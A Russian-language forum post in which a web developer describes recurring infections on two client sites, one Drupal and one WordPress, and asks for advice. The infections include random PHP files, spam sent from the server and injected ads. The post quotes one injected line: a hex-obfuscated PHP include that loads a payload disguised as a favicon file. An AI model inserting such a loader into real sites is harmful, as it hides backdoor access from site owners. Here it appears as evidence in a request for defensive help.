Взлом сайта

Приветствую. Столкнулся с такой проблемой.

Уже на 2х сайтах, которые никак друг с другом не связаны, нахожу вредоносные вставки и файлы. Сайты клиентские. Т.е приходит сайт в работу (продвижение/доработки, а там уже понапихано всякой дряни)

В чем суть:

на фтп создаются рандомные файлы иногда с названиями вида sdfs.php, иногда index.php в рандомных папках и в хаотичном порядке. Рандомное количество в день. Также добавляются вставки кода в основные файлы движка.

В файле index.php в корне, например, вот такое

/*ea20a*/



@include "\x2fh\x6fm\x65/\x6fk\x6eo\x73t\x72/\x77w\x77/\x73i\x74e\x32/\x70u\x62l\x69c\x5fh\x74m\x6c/\x6do\x64u\x6ce\x73/\x73y\x73t\x65m\x2ft\x65s\x74s\x2ff\x61v\x69c\x6fn\x5f4\x36c\x379\x30.\x69c\x6f";



/*ea20a*/

первый сайт на drupal, второй на wordpress.

Айболит не помогает. Им прогоняли, чистили все, что он нашел, на следующий день снова куча файлов и вставок.

С вордпресс проблему решили, поставили чистый движок и перекинули шаблон предварительно его проверив. (из модулей не ставили ничего). С друпалом все сложнее и займет очень много времени установка чистого и настройка модулей и всего сайта.

Кто-нибудь сталкивался? Самая бяка в том, что это все рассылает спам с сервера и некоторые хостеры могут заблочить функцию отправки письма, как было с сайтом на вордпресс (в итоге клиент ушел после полу года работы с отличными результатами из-за того, что не поверил, что вся эта вирусня появилась еще до работы с нами)

Кроме спама иногда на сайте появляется реклама (баннеры) не всплывающие, а между блоками сайта, аккуратно вставленная. После обновления страницы пропадает.

Буду благодарен за любой совет

---------- Добавлено 27.04.2018 в 11:28 ----------

Еще подметил. Если почистить файл от вставки, а на следующий день посмотреть - там снова она есть, но дата изменения файла не менялась.